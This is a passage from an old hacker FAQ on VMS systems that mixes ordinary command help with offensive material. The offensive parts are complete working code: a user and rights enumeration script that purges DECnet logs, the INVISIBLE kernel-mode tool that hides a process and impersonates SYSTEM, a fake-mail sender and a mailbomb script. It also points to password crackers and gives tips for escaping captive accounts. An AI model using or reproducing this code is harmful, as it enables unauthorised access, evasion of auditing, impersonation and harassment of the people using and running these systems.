	convinced,  a control-Z at the "Username" prompt will
	result in a "Error reading command input".  For example; 

Connected to upperdck.com
Escape character is '^]'.

	Welcome To The Upper-Deck Development Box

Username: *EXIT*
Error reading command input
End of file detected
Connection closed by foreign host.

	Identification of a VMS system should be fairly straight forward.

2.      "Where in the hell is the passwd file???!?!?!"

	There is no /etc/passwd file.  All user information is kept in
	a file called SYSUAF.DAT,  which is stored in the directory
	(or actual the logical) SYS$SYSTEM.   This file is usually
	not readable by "normal" users.

#	Older VMS systems (vanilla install) came with a few default 
	accounts (SYSTEM,  FIELD,  etc).  This is no longer the case
	with new releases.

3.	One file that is somtimes readable by "normal" users is the
	SYS$SYSTEM:RIGHTSLIST.DAT.  This file has a list of users and
	their respective rights identifiers.  Since the file isn't 
	very readable (embedded with control charaters),  an extraction
	program is a nice tool to have.  The following DCL procedure is 
	just an example of such a program and probably shouldn't be
	used,  especially on a large system,  because of its inefficiency. 

	* [Beave] - I have written several similar routines for VMS and
	PC based systems and will publish the code at a later date.  
	C versions (if the remote VMS box has a C compiler) can be 
	very handy.   As well,  I would keep archives of the VMS 
	executables (for systems without C compilers). 

	Another thing to note here,  as of OpenVMS 6.0,  the RIGHTSLIST.
	DAT is no longer readable by default. 

$! Program: Extract_Rights.Com
$! Author: Tsywt
$!
$ On Error Then $Goto Exit
$!
$ If F$mode() .Nes. "INTERACTIVE" then goto BATCH_END
$
$ Inquire system "Please enter system"
$ If system .eqs. ""
$  Then
$   Open/share in sys$system:rightslist.dat
$ Else
$   Open/share in 'system'::sys$system:rightslist.dat
$ Endif
$ Open/write out users.dat
$ Read/nolock in record
$Read_Loop1:
$ Read/nolock in record /end=Done_Users
$! If not at start of environmental identifiers
$ If f$extract(16,6,record) .nes. "BATCH "
$  Then
$   Write out f$extract(0,4,record) + " " + f$extract(16,32,record)
$ Else
$   Goto Done_Users
$ Endif
$ Goto Read_Loop1
$Done_Users:
$ Close out
$ Open/write out rights.dat
$ Write out f$extract(0,4,record) + " " + f$extract(16,32,record)
$Read_Loop7:
$ Read/nolock in record /end=Done_Rights
$! holder is null
$ If f$extract(8,1,record) .eqs. ""
$  Then
$   Write out f$extract(0,4,record) + " " + f$extract(16,32,record)
$ Endif
$ Goto Read_Loop7
$Done_Rights:
$ Close out
$!
$ Open/write out users_ids.dat
$ Open in2 users.dat
$Read_Loop2:
$ position = 0
$ Read/nolock in2 record1 /end=Done_Program
$Read_Loop3:
$! Go to first record in file because can't do key search on id
$ Open/share in3 rights.dat
$! Search holders for user id
$ Read/nolock/error=Done_No_Id in -
   record2/index=1/key="''f$extract(0,4,record1)'"/end=Done_No_Id
$Read_Loop4:
$! Kluge because nulls cause problems on key search
$ If f$extract(8,4,record2) .nes. f$extract(0,4,record1)
$  Then
$   Read/nolock in record2/end=Done_No_Id
$   Goto Read_Loop4
$ Endif
$! Move to next holder match
$ temp_pos = position
$Read_Loop5:
$ If temp_pos .gt. 0
$  Then
$   Read/nolock in record2/end=Read_Loop2
$   If f$extract(8,4,record2) .nes. f$extract(0,4,record1)
$    Then
$     Goto Read_Loop2
$   Endif
$   temp_pos = temp_pos - 1
$   Goto Read_Loop5
$ Endif
$Read_Loop6:
$! Look for identifier id
$ Read/nolock in3 record3/end=Done_No_Id
$ If f$extract(0,4,record3) .eqs. f$extract(0,4,record2)
$  Then
$   Write out f$extract(5,32,record1) + " " + f$extract(5,32,record3)
$   position = position + 1
$   Close in3
$   Goto Read_Loop3
$ Endif
$ Goto Read_Loop6
$Done_No_Id:
$ Write out f$extract(5,32,record1)
$ Close in3
$ Goto Read_Loop2
$Done_Program:
$Exit:
$ Close/error=Close_In2 in
$Close_In2:
$ Close/error=Close_Out in2
$Close_Out:
$ Close out
$ Delete users.dat.
$ Delete rights.dat.
$ If system .nes. ""
$  Then
$   Submit/after="+:15"/keep/params=('system') extract_rights.com
$ Endif
$ Exit
$Batch_End:
$Clean_Up:
$! Clean up DECnet logging
$ Dir 'p1'::netserver.log
$ Purge 'p1'::netserver.log
$ Exit

4.      "Is there a version of "Crack" that I can run on a VMS machine?"

	The Unix program, "Crack" will not work,  but there are password
	guessing routines available.

	The best one I have seen is "GUESS_PASSWORD.EXE",  which can be
	obtained from the following sites.

	ftp.wku.edu:/vms/fileserv/uaf.zip
	ftp.spc.edu:/macro32/savesets/uaf.zip

	In order for the routine to work,  you need access to the
	SYSUAF.DAT.  This version works on both OpenVMS VAX and 
	OpenVMS AXP.

	There is also a program available for the PC called VMSCrack 1.0.
	Once again, it requires that you have access to the SYSUAF.DAT
	so that you can copy it to the PC.

5.      "Can I 'Cloak' in routine in VMS?"

	Yes.  Below is the code needed to make your process invisible
	to "FINGER",  "SHOW USERS",  etc...
	Also, check out Bruce Ellis' "Hitchhikers Guide to VMS"

	First,  create the following file:

Name: BUILD_INVISIBLE.COM
---------------------------------[Cut Here]-----------------------------------
$ save_verify = 'f$verify(0)'
$ system = "vax"        !Set to "alpha" for Alpha
$!
$!  File to build Ehud Gavron's INVISIBLE
$!
$!  Author:     Hunter Goatley
$!
$ say := write sys$output
$ on error then goto common_exit
$ on contrl_y then goto common_exit
$ say "Extracting $JIBDEF and $PCBDEF from LIB.MLB...."
$ library/macro/extr=$JIBDEF/out=jibdef.mar sys$library:lib.mlb
$ library/macro/extr=$PCBDEF/out=pcbdef.mar sys$library:lib.mlb
$ say "Converting $*DEF macros to C .H files...."
$ call convert_to_h jibdef.mar
$ call convert_to_h pcbdef.mar
$ say "Compiling INVISIBLE...."
$ cc invisible
$ say "Linking INVISIBLE...."
$ link/notrace invisible,invisible.opt_'system'/opt
$ say "INVISIBLE build completed"
$ common_exit:
$       exit f$verify(save_verify).or.1
$ convert_to_h: subroutine
$ name = f$parse(p1,"","","NAME")
$ open/read tmp 'p1'
$ create 'name'.H
$ open/append tmph 'name'.H
$ cvt_loop:
$    read/error=cvt_fin tmp line
$    if f$extract(0,4,line).nes."$EQU" then goto cvt_loop
$    write tmph "#define ",f$extract(4,255,line)
$    goto cvt_loop
$ cvt_fin:
$    close tmp
$    close tmph
$ write sys$output "C header file ''name'.H created"
$ exit
$ endsubroutine
-------------------------------[End Of File]-----------------------------------

	Next is the C Code for the "INVISIBLE" routine....

Name:  INVISIBLE.C
---------------------------------[Cut Here]------------------------------------
/*
 * Invisible    - Make a process invisible and visible again.  Originally
 *                written in MACRO32.  Now in C so it runs on Alpha too.
 *
 *
 *      Option file invisible.opt:
 *              ALPHA:  sys$loadable_images:sys$base_image.exe/share
 *
 *              VAX:    sys$system:sys.stb/selective_search
 *
 *
 *      Build:
 *              $ cc invisible
 *              $ link invisible,invisible/opt
 *
 *      Usage:
 *              $ run invisible
 *
 *
 *  Ehud Gavron
 *  ACES Consulting Inc.
 *  Gavron@ACES.COM
 *
 *      14-Oct-1992     Ehud Gavron     Ported to C, Alpha, ANSI, and 
 *                                      everything else.
 *
 */

#define module_name INVISIBLE
#define module_version "V1.0.0"

#ifdef __alpha
#pragma module module_name module_version
#else /* __vax */
#module module_name module_version
#endif /* __alpha */

#ifndef __alpha
#define sys$gl_ijobcnt sys$gw_ijobcnt
#endif

#include <descrip.h>
#include "jibdef.h"     /* Extracted from LIB.MLB and massaged into C form */
#include "pcbdef.h"     /* Extracted from LIB.MLB and massaged into C form */
#include <ssdef.h>
#include <jpidef.h>
#include <psldef.h>
#include <lnmdef.h>
typedef union {
	struct {
		short s_buflen;
		short s_itemcode;
		char *s_bufaddr;
		int *s_retlen;
		} s;
	unsigned long end;
	} ITEMLIST;

#define buflen          s.s_buflen
#define itemcode        s.s_itemcode
#define bufaddr         s.s_bufaddr
#define retlen          s.s_retlen

struct ISB {
	int     l_uic;
	int     l_namelen;
#ifdef __alpha
	int     l_jobtype;
#else
	char    b_jobtype;
#endif
	char    b_terminal;
	char    t_lname[PCB$S_LNAME + 1];
	char    t_username[JIB$S_USERNAME + 1];
	};

struct ISB isb;
static int lnm_retlen;

ITEMLIST lnm_itmlst[2];
ITEMLIST jpi_itmlst[2];
struct dsc$descriptor_s prcnam_desc;
struct dsc$descriptor_s prcnam;
$DESCRIPTOR(lnm_tabnam,"LNM$PROCESS_TABLE");
$DESCRIPTOR(lnm_lognam,"ISB");
$DESCRIPTOR(fao_prcnam,"SYMBIONT_!UL");
int sysuic = 0x00010004;
char sysusername[] = "SYSTEM        ";
char namebuf[PCB$S_LNAME];

#ifdef __alpha
main()
#else
cmain()
#endif
{
	int sys$cmkrnl(),sys$exit(),invisible_k();
	int ss_stat;

	lnm_itmlst[0].buflen = sizeof(isb);
	lnm_itmlst[0].itemcode = LNM$_STRING;
	lnm_itmlst[0].bufaddr = (char *)&isb;
	lnm_itmlst[0].retlen = &lnm_retlen;
	lnm_itmlst[1].end = 0;

	jpi_itmlst[0].buflen = PCB$S_LNAME;
	jpi_itmlst[0].itemcode = JPI$_PRCNAM;
	jpi_itmlst[0].bufaddr = (char *)&isb.t_lname;
	jpi_itmlst[0].retlen = (int *)&isb.l_namelen;
	jpi_itmlst[1].end = 0;

	prcnam_desc.dsc$a_pointer = (char *)&isb.t_lname;
	prcnam_desc.dsc$w_length = PCB$S_LNAME;
	prcnam_desc.dsc$b_dtype = DSC$K_DTYPE_T;
	prcnam_desc.dsc$b_class = DSC$K_CLASS_S;

	prcnam.dsc$a_pointer = (char *)&namebuf;
	prcnam.dsc$w_length = PCB$S_LNAME;
	prcnam.dsc$b_dtype = DSC$K_DTYPE_T;
	prcnam.dsc$b_class = DSC$K_CLASS_S;

	ss_stat = sys$cmkrnl(invisible_k,0);
	(void) sys$exit(ss_stat);       
}

int invisible_k()
{
	int sys$getjpiw(),sys$crelnm(),sys$fao(),sys$setprn();
	int strncpy(),sys$exit(),sys$trnlnm(),sys$dellnm();
	int *a_long;
	int acmode = PSL$C_KERNEL;

#pragma nostandard                      /* Oh well */
	globalref ctl$gl_pcb;
	globalref sys$gl_ijobcnt;
#pragma standard

	int ss_stat;
	char *pcb;
	char *jib;
	long *sts;
	long *own;
	char *p;
	long *q;
	int loop = 0;

	pcb = (char *)ctl$gl_pcb;

	if (pcb == 0) {
	   return(0);
	   }
	q = (long *)((char *)pcb + PCB$L_JIB);
	jib =(char *)  *q;

	sts = (long *)((char *)pcb + PCB$L_STS);

	if (*sts & PCB$M_INTER) {       /* Do stealth mode */
	   *sts = *sts^PCB$M_INTER;
	   *sts = *sts|PCB$M_NOACNT;

	   own = (long *)((char *)pcb + PCB$L_OWNER);
	   if (*own == 0) {  /* We are not a subprocess  */
	      sys$gl_ijobcnt--;
	      }

	   p = (char *)pcb + PCB$T_TERMINAL;
	   isb.b_terminal = *p;
	   *p = '\0'; 

#ifdef __alpha
	   q = (long *)((char *)jib + JIB$L_JOBTYPE);
	   isb.l_jobtype = *q;
	   *q = 0;
#else
	   p = (char *)jib + JIB$B_JOBTYPE;
	   isb.b_jobtype = *p;
	   *p = '\0';
#endif
	   strncpy((char *)&isb.t_username,
		   (char *)(jib + JIB$T_USERNAME),
		   JIB$S_USERNAME);

	   strncpy((char *)(jib + JIB$T_USERNAME),
		   (char *)&sysusername,
		   JIB$S_USERNAME);

	   q = (long *)((char *)pcb + PCB$L_UIC);
	   isb.l_uic = *q;
	   *q = sysuic;

	   ss_stat = sys$getjpiw(0,0,0,&jpi_itmlst,0,0,0);
	   if (!(ss_stat & 1)) return(ss_stat);
	   ss_stat = sys$crelnm(0,
				&lnm_tabnam,
				&lnm_lognam,
				&acmode,
				&lnm_itmlst);
	   if (!(ss_stat & 1)) return(ss_stat);
	   do {
	      loop++;
	      prcnam.dsc$w_length = PCB$S_LNAME;
	      ss_stat = sys$fao((char *)&fao_prcnam,
				(char *)&prcnam.dsc$w_length,
				(char *)&prcnam,
				loop);
	      if (!(ss_stat &1)) return(ss_stat);
	      ss_stat = sys$setprn((char*)&prcnam);
	      } while (ss_stat == SS$_DUPLNAM);      
	   return(SS$_NORMAL);
	   }
	else {  /* unstealth */
	   ss_stat = sys$trnlnm(0,
				&lnm_tabnam,
				&lnm_lognam,
				&acmode,
				&lnm_itmlst);
	   if (!(ss_stat & 1)) return(ss_stat);

	   ss_stat = sys$dellnm(&lnm_tabnam,
				&lnm_lognam,
				&acmode);
	   if (!(ss_stat & 1)) return(ss_stat);

	   *sts = *sts|PCB$M_INTER;
	   *sts = *sts^PCB$M_NOACNT;

	   own = (long *)((char *)pcb + PCB$L_OWNER);
	   if (*own == 0) {  /* We are not a subprocess  */
	      sys$gl_ijobcnt++;
	      }

	   q = (long *)((char *)pcb + PCB$L_UIC);
	   *q = isb.l_uic;

	   p = (char *)pcb + PCB$T_TERMINAL;
	   *p = isb.b_terminal;

#ifdef __alpha
	   q = (long *)((char *)jib + JIB$L_JOBTYPE);
	   *q = isb.l_jobtype;
#else
	   p = (char *)jib + JIB$B_JOBTYPE;
	   *p = isb.b_jobtype;
#endif
	   strncpy((char *)(jib + JIB$T_USERNAME),
		   (char *)&isb.t_username,
		   JIB$S_USERNAME);

	   prcnam_desc.dsc$w_length = (short)isb.l_namelen;
	   ss_stat = sys$setprn(&prcnam_desc);
	   return;
	}
}

#ifndef __alpha
int strncpy(a,b,c)
char *a,*b;
int c;
{
	for (; c > 0; c--) {
	  *a++ = *b++;
	  }
}
#endif
--------------------------------[End Of File]----------------------------------

	After these files are created,   type in the following at your
	DCL prompt:

$ @build_invisible      ! This will build our INVISIBLE.EXE routine.
$ run invisible         ! One the build is complete. 

	You should be completely "cloaked".

	To obtain full source, readme files,  etc,  you can obtain this
	program from:

	ftp.wku.edu:/vms/fileserv/invisible.zip
	ftp.spc.edu:/macro32/savesets/invisible.zip

6.      "How do I change damn directory's?". 

	This is done via the "SET DEFAULT" command.  In the following 
	format:

$ SET DEFAULT device:[directory]

	VMS uses a standard hierarchy system,  in which devices and 
	directory's are separated.  For example,  our home device/directory 
	might be:

	DISK3:[USR.JOEHACKER]

	DISK3:  would represent the device that we are on/using
	while,  [USR.JOEHACKER] would signify the actual directory
	on that device that we are using.  So,  to change directory's, 
	we could type:

$ SET DEFAULT [USR.BOB]

	If [USR.BOB] is a existing directory,  this would now be our
	current path (and we would still be located on the DISK3: 
	device.  If we wanted to simply back out one level (to the 
	[USR]) on that device,  we would issue the following command:

$ SET DEFAULT [-]

	The "[-]" signifies one directory back.  So if our path is,
	[USR.BOB.HACKING.VMS.PROGRAMS],  and we want to get to the 
	[USR.BOB] directory,  instead of typing the entire path 
	again,  we could simply type:

$ SET DEFAULT [---]

	"[---]" means,  back out three levels of the hierarchy. 

	There can be several devices on one VMS system (Device names
	can be obtained via a "SHOW DEVICES").  While your 
	home directory might be on DISK3,   another users could
	be on device DISK2.   To switch devices, we can add in
	the device name,  followed by the directory (if needed). 
	So,  if you need to get to a users who stores information
	in the DISK2:[REALLY.SECRET.STUFF] directory,  you could
	type the following DCL command:

$ SET DEFAULT DISK2:[REALLY.SECRET.STUFF]

	Or if we are currently in the "DISK3:[REALLY]" and we want
	to get to the information in the "DISK2:[REALLY]" directory,
	we could simply type 

$ SET DEFAULT DISK2:

	And the rest would be carried over. 

	In the event that you need to get to the top of the hierarchy
	(Unix equivalent:  "cd /"),  SET DEFAULT (to any disk structured
	device) to "[000000]".  For example,  to get to the very
	top of the hierarchy on device DISK2,  you would type. 

$ SET DEFAULT DISK2:[000000]

	VMS will also allow you to SET DEFAULT to a directory that does
	not exist.  When this happens,  the operating system will 
	inform you of this when you try to issue a command that requires
	some sort of file I/O.   If at any point you get completely 
	lost,  you can return to your "home" directory by typing

$ SET DEFAULT SYS$LOGIN:

7.      "I hate this SET DEFAULT crap.  Can I just use 'cd' command like
	 I do in Unix?". 

	By default,  no.  There are two things that you can do. 
	One,  add the following line to your "LOGIN.COM" (see
	where my .profile in VMS' for more information)

$ CD :== SET DEFAULT    ! I am hate typing that long "SET DEF" command

	Or you can us the following .COM file,  which will guarantee
	that you eat as many resources as you can......

	      [Taken from Phrack,  Vol. 2.  Issue 19.,  File 2]
			   [ Coded By The Mentor ]

			      Code for CD.COM
			       >>>>>>>>>>>>>>>

$! CD.COM v6.09
$! The Ultimate Change Directory Command.
$!
$  hdir     = f$trnlnm("SYS$LOGIN")                 ! Home Directory
$  ndir     = f$edit(p1,"UPCASE")                   ! New  Directory
$  odir     = f$environment("DEFAULT")              ! Old  Directory
$  prompton = (f$edit(f$trnlnm("SYS$PROMPT"),"UPCASE") .eqs. "ON")
$!
$  if (ndir .eqs. "")           then goto DISPLAY   ! No Dir
$  if (ndir .eqs. "*")          then goto DIRSEARCH ! Search for Dirs
$  if (ndir .eqs. "?")          then goto HELP      ! Instructions
$!
$  PARSE:
$  length   = f$length(ndir)                        ! Fix up ndir
$  if (f$location("@",ndir) .eq. 0) .or. -
      (f$location("$",ndir) .eq. 0) then ndir = f$extract(1, length - 1, ndir)
$  right    = f$location("]",ndir) + 1
$  if (right .gt. length) then right = f$location(">", ndir)
$  if (right .le. length) then ndir  = f$extract(0, right, ndir)
$!
$  if (f$trnlnm(ndir) .eqs. "") then goto CASESYM   ! Not Logical Name
$     ndir   = f$trnlnm(ndir)                       ! Logical Name
$     goto PARSE
$!
$  CASESYM:
$  if ("''&ndir'" .eqs. "")     then goto CASE0     ! Not Symbol
$     ndir = 'ndir'                                 ! Symbol
$     goto PARSE
$!
$  CASE0:
$  len_ndir = f$length(ndir)                        ! Regular Dir
$  if (f$location("[", ndir) .lt. len_ndir) .or. -
      (f$location("<", ndir) .lt. len_ndir) then goto SETDIR
$!
$  CASE1:                                           ! Home Dir
$  if ((ndir .nes. "HOME") .and. (ndir .nes. "\")) then goto CASE2
$     ndir = hdir
$     goto SETDIR
$!
$  CASE2:                                           ! . .. .dir
$  if (f$location(".", ndir) .nes. 0) then goto CASE3
$     if (ndir .eqs. "..") then ndir = "-"
$     if (f$extract(0, 2, ndir) .eqs. "..") -
	 then ndir = "-" + f$extract(1, len_ndir - 1, ndir)
$     ndir = "[" + ndir + "]"
$     if (ndir .eqs. "[.]") then ndir = odir
$     goto SETDIR
$!
$  CASE3:                                           ! :
$  if (f$location(":", ndir) .ge. len_ndir) then goto CASE4
$     left    = f$location(":", ndir) + 1
$     symbol  = f$extract(left, 1, ndir)
$     if (symbol .eqs. ":")  then goto CASE3B       ! :: Node
$     if ((symbol .eqs. "[") .or. (symbol .eqs. "<")) then goto SETDIR
$        ndir = f$extract(0, left, ndir) + "[" -
	      + f$extract(left, len_ndir - left+1, ndir) + "]"
$     goto SETDIR
$!
$  CASE3B:                                          ! NODE::nothing
$  if (f$length(ndir)-1 .gt. left) then goto CASE3C
$     ndir = ndir + "[000000]"
$     goto SETDIR
$!
$  CASE3C:                                          ! NODE::directory
$  if ((f$location("[", ndir) - f$location("<", ndir)) .ne. 0) -
      then goto SETDIR
$
$     ndir = f$parse(ndir,,,"NODE") + "[" + f$parse(ndir,,,"NAME") + "]"
$     goto SETDIR
$!
$  CASE4:                                           ! dir
$  ndir = "[" + ndir + "]"
$!
$  SETDIR:
$  set default 'ndir'
$  if (f$parse("") .eqs. "") then goto DIRERROR
$!
$  DISPLAY:
$  if ((ndir .nes. "") .and. prompton) then goto NODISPLAY
$     hnode = f$getsyi("NODENAME")
$     cnode = f$parse(f$trnlnm("SYS$DISK"),,,"NODE") - "::"
$     if (cnode .eqs. "") then cnode = hnode
$     cdir  = f$environment("DEFAULT")
$     write sys$output " "
$     write sys$output "          Home Node: ", hnode
$     write sys$output "     Home Directory: ", hdir
$     if (cdir .eqs. hdir) .and. (cnode .eqs. hnode) then goto DISPSKIP
$     write sys$output "       Current Node: ", cnode
$     write sys$output "  Current Directory: ", cdir
$  DISPSKIP:
$     write sys$output " "
$!
$  NODISPLAY:
$  ndir = f$environment("DEFAULT")
$  if .not. prompton then goto END
$!
$  if (f$length(ndir) .ge. 32) then goto TOOLONG
$!
$  SETPROMPT:
$  set prompt = 'ndir'" "
$!
$  END:
$  exit
$!
$  DIRERROR:
$  write sys$output " "
$  write sys$output "          ", ndir, " Directory does not exist!"
$  write sys$output " "
$  set default 'odir'
$  ndir = odir
$  goto NODISPLAY
$!
$! Prompt Problems------------------------------------------------------------
$!
$  TOOLONG:
$! Prompt is too long. Get rid of everything to the left of [ or <. If that
$! doesn't work, get rid of a subdirectory at a time.  As a last resort,
$! set the prompt back to $.
$!
$  left     = f$location("[", ndir)
$  len_ndir = f$length(ndir)
$  if (left .ge. len_ndir) then left = f$location("<",ndir)
$  if (left .gt. 0) .and. (left .lt. len_ndir) -
      then ndir = f$extract(left, len_ndir - left, ndir)
$!
$  STILLTOOLONG:
$    if (f$length(ndir) .lt. 32) then goto SETPROMPT
$    left     = f$location(".", ndir) + 1
$    len_ndir = f$length(ndir)
$    if left .ge. len_ndir then ndir = "$ "
$    if left .ne. len_ndir -
	then ndir = "[*" + f$extract(left, len_ndir - left, ndir)
$    goto STILLTOOLONG
$!
$! Wildcard Directory---------------------------------------------------------
$!
$  DIRSEARCH:
$  error_message = f$environment("MESSAGE")
$  on control_y then goto DIREND
$  on control_c then goto DIREND
$  set message/nosev/nofac/noid/notext
$  write sys$output " "
$  dispct = 1
$  dirct  = 0
$  pauseflag = 1
$!
$  DIRLOOP:
$    userfile = f$search("*.dir")
$    if (userfile .eqs. "") .and. (dirct .ne. 0) then goto DIRMENU
$    if (userfile .eqs. "") then goto DIRNONE
$    dispct = dispct + 1
$    dirct  = dirct  + 1
$    on severe then $ userprot = "No Priv"
$    userprot = f$file_attributes(userfile,"PRO")
$    if userprot .nes. "No Priv" then userprot = " "
$    userfile'dirct' = "[." + f$parse(userfile,,,"NAME") + "]"
$    userprot'dirct' = userprot
$    lengthflag = (f$length(userfile'dirct') .gt. 18)
$    if lengthflag then write sys$output -
	f$fao("  !3SL   !34AS  ", dirct, userfile'dirct'), userprot'dirct'
$    if (.not. lengthflag) then write sys$output -
	f$fao("  !3SL   !20AS  ", dirct, userfile'dirct'), userprot'dirct'
$    if (dispct .lt. 8) then goto DIRLOOP
$    dirct  = dirct  + 1
$    userfile'dirct' = ""
$    dirct  = dirct  + 1
$    userfile'dirct' = ""
$    if pauseflag then goto DIRMENU
$    dispct = 0
$    goto DIRLOOP
$!
$  DIRMENU:
$  write sys$output " "
$  if (userfile .eqs. "") then goto DIRMENU2
$     write sys$output "    M   More subdirectories"
$  if pauseflag then -
$     write sys$output "    N   More subdirectories/No pause"
$!
$  DIRMENU2:
$     write sys$output "    R   Re-Display subdirectories"
$     write sys$output "    Q   Quit (default)"
$
$  DIRINQUIRE:
$  write sys$output " "
$  inquire dirchoice "  Select One"
$  write sys$output " "
$!
$  if (dirchoice .gt. 0)    .and. -
      (dirchoice .le. dirct) then goto DIRCASEDIGIT
$  dirchoice = f$edit(dirchoice,"UPCASE")
$  if (dirchoice .eqs. "")  .or. -
      (dirchoice .eqs. "Q")  then goto DIRCASEBLANK
$  if (dirchoice .eqs. "M") .or. -
      (dirchoice .eqs. "N")  then goto DIRCASEMORE
$  if (dirchoice .eqs. "R")  then goto DIRCASERED
$!
$  DIRCASERROR:
$  if (dirct .eq. 1)   then write sys$output -
      "  Select 1 to change to the ", userfile1, " subdirectory. "
$  revdirct = dirct
$  if (dispct .eq. 8) then revdirct = revdirct - 2
$  if (dirct .gt. 1)   then write sys$output -
      "  Valid subdirectory selections are 1 through ", revdirct, " (Octal)."
$  goto DIRINQUIRE
$!
$  DIRCASEDIGIT:
$  if (userfile'dirchoice' .eqs. "") then goto DIRCASERROR
$  ndir = userfile'dirchoice'
$  goto DIREND
$!
$  DIRCASEBLANK:
$  write sys$output "  Subdirectory not changed."
$  write sys$output " "
$  goto DIREND
$!
$  DIRCASEMORE:
$  dispct = 0
$  if (dirchoice .eqs. "N") then pauseflag = 0
$  if (userfile .nes. "")   then goto DIRLOOP
$  write sys$output "  No more subdirectories to display."
$  goto DIRINQUIRE
$!
$  DIRCASERED:
$  dispct = 1
$  DISPLOOP:
$     if (userfile'dispct' .eqs "") then goto DISPDONT
$     lengthflag = (f$length(userfile'dispct') .gt. 18)
$     if lengthflag then write sys$output -
	 f$fao("  !3SL   !34AS  ", dispct, userfile'dispct'), userprot'dispct'
$     if (.not. lengthflag) then write sys$output -
	 f$fao("  !3SL   !20AS  ", dispct, userfile'dispct'), userprot'dispct'
$     DISPDONT:
$     dispct = dispct + 1
$     if (dispct .le. dirct) then goto DISPLOOP
$  goto DIRMENU
$!
$  DIRNONE:
$  write sys$output "No subdirectories to choose, or no directory privileges."
$  write sys$output " "
$  goto DIREND
$!
$  DIREND:
$  set message 'error_message'
$  on control_y then exit
$  on control_c then exit
$  if (ndir .eqs. "*") then goto DISPLAY
$  goto PARSE
$!
$!-Help-----------------------------------------------------------------------
$!
$  HELP:
$  type sys$input

	       CD.COM  Version 6  VMS Change Directory Command

			 Usage:  CD command/directory

CD         Display home directory,       CD ..       Change directory to the
	   current directory, node.      CD [-]      dir above current dir.

CD \       Change directory to your      CD ..sub    Change directory to a
CD HOME    SYS$LOGIN directory.          CD [-.sub]  "sideways" subdirectory.

CD dir     Change directory to the       CD *        Display/select the
CD [dir]   [dir] directory.                          available subdirectories.

CD .sub    Change directory to the       CD .        Reset current directory.
CD [.sub]  [.sub] subdirectory.          CD ?        Display CD instructions.

     CD :== @SYS$LOGIN:CD.COM                 DEFINE SYS$PROMPT "ON"
     To make CD available from                To have the VMS $ prompt
     any directory you change to.             display the current directory.

			      By The Mentor
$  goto END

	Once uploaded,  you should add the following line you your
	LOGIN.COM:

$ CD :== @DEVICE:[PATH]CD.COM  ! Replace DEVICE/PATH with user information

8.      "Okay,  where's my .profile"

	Easy.  There is none.  VMS startup routines (for personal accounts)
	can be found in the user's home directory under the name 
	"LOGIN.COM". Also check out the system-wide login routine at
	SYS$MANAGER:SYLOGIN.COM.

9.      "I can't seem to get to the DCL prompt"

	It is possible to setup "CAPTIVE" and "RESTRICTED" accounts under
	VMS. When setup correctly,  these can be difficult to break out of,
	however, in alot of cases, a simple control-C while the LOGIN.COM
	is executing.  Another method of keeping the LOGIN.COM 
	(or any commands for that fact) is to login with the 
	"/NOCOMMAND" flag.  This flag is placed after your username 
	at the USERNAME prompt,  and will bypass any account startup
	files/commands.    On a correctly setup captive account, 
	this will bomb out.    In the event that this fails,   some
	places slip up by allowing a parent to spawn off other
	processes.  For example,  if the captive account puts you
	into KERMIT, FTP,  or ALL-IN-ONE (Office automation/mail package), 
	it might be able to 'SPAWN' out to DCL or issue DCL commands. This
	can also  be prevented by simply setting up process limitation
	on the account.  

*10.     Terminal Spoofing

	There are many DEC VT spoofing programs around to find. One can
	even be found on page 32 in the Winter 94-95 issue of 2600: Hook
	by Mr.Bungle.

*11.     User Spoofing

	Programs such as "SETUSER" and "GLOGIN" are in the public domain
	for privileged users to operate as other users. 

*12.     Accounting/Auditing Information

	Accounting information is kept in the file SYS$MANAGER:ACCOUNTNG.DAT
	($ACCOUNTING).
	A list of auditing options is available for the sys admin ($SET AUDIT).
	An intrusion database is part of the VMS security scheme
	($SHOW INTRUSION).
	"The Supervisor Series" (as reviewed in the Fall 94 issue of 2600)
	allows a privileged user to spy on and intervene in another user's
	on-line activities. It is public domain available at
	ftp.spc.edu /anonymous/macro32/savesets.
	There are also short programs out there for a privileged user to look
	at a user's command buffer.

		 -       VMSmail/SMTP Information     - 

1.     It is possible to send fake mail through VMSmail objects. DECNet
       object logs are produced and readable by sys admins.

$! To send anonymous or fake messages(except for remote node system admins -
$! mail server logs) through the MAIL mailbox to any user logged on the NET;
$! must only have NETMBX privilege
$null[0,8] = 0
$remote_node = P1
$if P1 .eqs. "" then read sys$command remote_node   /prompt="node: "
$local_user = P2
$if P2 .eqs. "" then read sys$command local_user    /prompt="local user: "
$local_user := 'local_user                      ! remove blanks and lowercases
$real_remote_user = P2
$if P2 .eqs. "" then -
  read sys$command real_remote_user /prompt="real remote user: "
$real_remote_user := 'real_remote_user          ! remove blanks and lowercases
$remote_user = P3
$if P3 .eqs. "" then read sys$command remote_user /prompt="remote user: "
$remote_user := 'remote_user           ! remove blanks and lowercases
$subject = P4
$if P4 .eqs. "" then read sys$command subject       /prompt="subject: "
$filename = P5
$if P5 .eqs. "" then read sys$command filename      /prompt="file name: "
$filename := 'filename
$!
$open/read/write slave 'remote_node'::"27="
$write slave "''local_user'"
$write slave "''real_remote_user'"
$read slave status
$write sys$output f$fao("Addressee status is: !XL",f$cvui(0,8,status))
$write slave null
$if filename .nes. ""
$ then
$  write slave "''remote_user'"
$  write slave "''subject'"
$  open/read/error=end_of_file file 'filename'
$loop:
$  read/end=end_of_file file record
$  write slave "''record'"
$  goto loop
$else
$ write slave "To whomever it concerns"
$ write slave "Demo of using VAXMail protocol"
$ write slave "This is message line"
$endif
$end_of_file:
$close/nolog file
$write slave null
$read slave status
$write sys$output f$fao("Delivery status is: !XL",f$cvui(0,8,status))
$close slave
$exit

			VMS Mail Hack Routines

1.     I use my favorite Unix sendmail holes on VMS sendmail?"

	Don't be silly.  No...  Digital did not believe that sendmail
	bugs and holes were important enough to port (grin).  (It 
	has been rumored that one sendmail hole *was* actually ported,  
	but as of this time,  this has not be verified. 

2.      "How can I code a mail bomb routine,  so that I can piss off
	 people really good and eat 'bandwidth'."

	Like this,  below...  

$! Simple VMS Mailbomb routine. 
$! Please be somewhat human.   Don't do this crap.
$!
$ say :== write sys$output
$ on error then goto err
$ if p4 .eqs. "" 
$ then 
$ say "Mailbomb V1.0                            Coded By The Beaver"
$ say "1995"
$ say ""
$ say "Usage:"
$ say "MAILBOMB [Msg Subject] [File to bomb with] [Username] [# of Times]"
$ exit
$ endif
$ A=1
$ loop:
$ mail/subject='p1' 'p2' 'p3' 
$ A = A + 1
$ if A .eqs. p4
$       then
$       say "Bomb Is Complete"
$       exit
$       endif
$ goto loop
$ err:
$ say "A Error has occured.  Be sure all files are present and correct"
$ exit

